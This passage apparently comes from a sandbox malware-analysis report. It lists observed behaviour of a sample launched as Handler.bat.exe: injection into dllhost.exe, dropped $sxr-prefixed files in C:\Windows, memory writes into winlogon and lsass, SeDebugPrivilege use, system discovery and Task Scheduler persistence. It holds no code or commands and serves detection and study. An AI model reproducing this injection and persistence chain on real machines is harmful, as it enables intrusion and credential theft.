PID 4528 set thread context of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 set thread context of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 4900 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 set thread context of 5176 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 set thread context of 5240 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 1280 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 3936 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 5820 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 5708 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 5188 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 376 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 5292 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 2020 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 set thread context of 4460 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 set thread context of 5700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\dllhost.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\$sxr-mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2576 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 2576 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 4268 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4528 wrote to memory of 3552 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 1772 wrote to memory of 2252 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 1772 wrote to memory of 2252 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 2252 wrote to memory of 3168 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 2252 wrote to memory of 3168 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 3700 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 2916 N/A C:\Windows\$sxr-powershell.exe C:\Windows\SysWOW64\dllhost.exe
PID 3168 wrote to memory of 4108 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3168 wrote to memory of 4108 N/A C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 3168 wrote to memory of 4788 N/A C:\Windows\$sxr-powershell.exe C:\Windows\System32\dllhost.exe
PID 4788 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 4788 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 4788 wrote to memory of 956 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1016 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 4788 wrote to memory of 392 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 436 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4788 wrote to memory of 1128 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1136 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4788 wrote to memory of 1144 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 4788 wrote to memory of 1152 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1272 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1332 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1412 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 4788 wrote to memory of 1448 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

